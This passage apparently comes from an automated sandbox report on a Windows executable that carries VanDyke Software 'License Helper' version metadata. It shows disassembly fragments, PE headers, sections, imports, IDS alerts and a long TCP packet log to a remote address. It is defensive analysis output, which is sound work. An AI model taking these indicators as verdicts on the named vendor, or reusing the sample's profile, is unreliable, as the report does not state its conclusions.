call 00007FA9F0C4574Fh
mov eax, dword ptr [0040CF80h]
mov dword ptr [0040CF84h], eax
push eax
push dword ptr [0040CF78h]
push dword ptr [0040CF74h]
call 00007FA9F0C44572h
add esp, 0Ch

Rich Headers

Programming Language:

[C++] VS98 (6.0) SP6 build 8804
[ C ] VS98 (6.0) SP6 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8af0	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe000	0x3d4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x150	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6ba7	0x7000	False	0.592808314732	data	6.44090698985	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1186	0x2000	False	0.27001953125	data	3.62785728692	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x365c	0x3000	False	0.0795084635417	data	0.841262202445	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xe000	0x1000	0x1000	False	0.111083984375	data	1.09363315293	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xe058	0x37c	data	English	United States

Imports

DLL	Import
KERNEL32.dll	GetProcAddress, LoadLibraryA, lstrlenW, InterlockedDecrement, CloseHandle, WriteFile, CreateFileW, lstrcatW, GetModuleFileNameW, RaiseException, LocalFree, lstrlenA, InterlockedIncrement, GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, MultiByteToWideChar, RtlUnwind, GetCommandLineA, GetVersion, ExitProcess, HeapFree, HeapAlloc, GetCurrentThreadId, TlsSetValue, TlsAlloc, SetLastError, TlsGetValue, GetLastError, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, GetModuleFileNameA, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, GetModuleHandleA, GetEnvironmentVariableA, GetVersionExA, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, HeapReAlloc, IsBadWritePtr, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, IsBadReadPtr, IsBadCodePtr, GetCPInfo, GetACP, GetOEMCP, HeapSize
USER32.dll	wsprintfW
ole32.dll	CoInitializeSecurity, CoUninitialize, CoInitialize, CoCreateInstance, CoSetProxyBlanket
OLEAUT32.dll	VariantInit, SafeArrayGetDim, SafeArrayGetLBound, SafeArrayGetUBound, SafeArrayAccessData, SafeArrayUnaccessData, SysStringLen, SysAllocStringLen, SysAllocString, VariantClear, SysFreeString, GetErrorInfo

Version Infos

Description	Data
LegalCopyright	Copyright (C) 1995-2018 VanDyke Software, Inc.
InternalName	License Helper
FileVersion	8.5.0.1740
CompanyName	VanDyke Software, Inc.
Comments	\$Revision: 122570 \$
ProductName	License Helper
ProductVersion	8.5.0.1740
FileDescription	License Helper
OriginalFilename	LicenseHelper.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/03/21-23:42:27.324731	UDP	1948	DNS zone transfer UDP	57569	53	192.168.2.3	34.97.69.225
08/03/21-23:42:33.315221	UDP	1948	DNS zone transfer UDP	57569	53	192.168.2.3	34.97.69.225
08/03/21-23:42:43.654284	UDP	1948	DNS zone transfer UDP	57569	53	192.168.2.3	34.97.69.225
08/03/21-23:42:55.609356	UDP	1948	DNS zone transfer UDP	57569	53	192.168.2.3	34.97.69.225
08/03/21-23:43:04.923912	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	34.97.69.225
08/03/21-23:43:05.644246	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	34.97.69.225
08/03/21-23:43:06.843778	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	34.97.69.225
08/03/21-23:43:07.564120	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	34.97.69.225
08/03/21-23:43:09.426405	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	34.97.69.225

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 23:42:08.264192104 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:08.281058073 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.281203985 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:08.287096024 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:08.303870916 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.307393074 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.307447910 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.307477951 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.307560921 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:08.318670988 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:08.335412979 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.335603952 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.378514051 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:08.385346889 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:08.403290987 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.921807051 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.921857119 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.921886921 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.921914101 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.921951056 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.921989918 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.922009945 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.922108889 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:08.922177076 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.922216892 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.922245026 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.922297001 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:08.922307014 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:08.922348976 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:08.922486067 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.922534943 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.922575951 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.922605991 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.922712088 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:08.923085928 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.923157930 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:08.923270941 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.175451994 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.175498962 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.175534010 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.175575972 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.175605059 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.175611973 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.175653934 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.175673962 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.175688028 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.175703049 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.175932884 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.175975084 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.176001072 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.176013947 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.176049948 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.176105022 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.176722050 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.176764011 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.176800013 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.176834106 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.176837921 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.176873922 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.177556992 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.177594900 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.177649021 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.177679062 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.177679062 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.177722931 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.178124905 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.178167105 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.178204060 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.178239107 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.178250074 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.178320885 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.178942919 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.178983927 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.179012060 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.179105043 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.179135084 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.179177046 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.179208994 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.179280043 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.427622080 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.427695036 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.427738905 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.427767038 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.427803993 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.427833080 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.427968025 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.428467035 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.428498983 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.428536892 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.428572893 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.428653002 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.428764105 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.428802013 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.428848982 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.428889990 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.428935051 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.429013014 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.429570913 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.429613113 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.429649115 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.429688931 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.429740906 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.429820061 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.430349112 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.430391073 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.430427074 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.430511951 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.430941105 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.430977106 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.431022882 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.431031942 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.431056976 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.431169987 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.431544065 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.431572914 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.431638002 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.431736946 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.431776047 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.431813002 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.431814909 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.431842089 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.431886911 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.432375908 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.432404041 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.432461023 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.432600021 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.432638884 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.432673931 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.432677984 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.432704926 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.432786942 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.433240891 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.433280945 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.433307886 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.433326006 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.433420897 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.437148094 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.437194109 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.437280893 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.681770086 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.682306051 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.682356119 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.682390928 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.682399035 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.682429075 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.682461977 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.682468891 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.682507038 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.682529926 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.682535887 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.682574987 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.682593107 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.682604074 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.682660103 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.682809114 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.682848930 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.682885885 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.682912111 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.682914972 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.682970047 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.683485985 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.683527946 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.683566093 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.683588028 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.683604956 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.683665991 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.684310913 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.684351921 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.684390068 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.684421062 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.684428930 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.684492111 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.685048103 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.685081959 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.685163021 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.685367107 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.685408115 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.685445070 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.685461998 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.685473919 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.685518026 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.685971022 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.686002016 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.686068058 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.686194897 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.686230898 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.686276913 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.686278105 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.686320066 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.686371088 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.686975956 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.687016964 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.687052965 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.687077999 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.687104940 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.687154055 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.687195063 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.687630892 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.687736034 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.934550047 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.934576988 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.934587955 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.934597015 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.934752941 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.934775114 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.934824944 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.934840918 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.934875011 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.934966087 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.935636997 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.935653925 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.935666084 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.935682058 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.935689926 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.935842991 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.936032057 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.936044931 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.936150074 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.936748028 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.936768055 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.936806917 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.936820030 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.936911106 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.936950922 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.936983109 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.937028885 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.937205076 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.937227011 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.937241077 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.937254906 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.937329054 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.937726021 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.938294888 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.938314915 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.938335896 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.938361883 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.938393116 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.938395977 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.938415051 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.938430071 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.938478947 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.938672066 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.938693047 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.938740015 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.938922882 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.938954115 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.938981056 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.938994884 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.939003944 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.939045906 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.939508915 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.939532042 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.939596891 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.944382906 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.944412947 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.944439888 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.944461107 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.944490910 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.944545984 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.944679022 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.944706917 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.944727898 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.944756031 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.944771051 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.944807053 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:09.945441961 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:09.945534945 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:10.193644047 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.193762064 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:10.193833113 CEST	443	49712	172.67.146.70	192.168.2.3
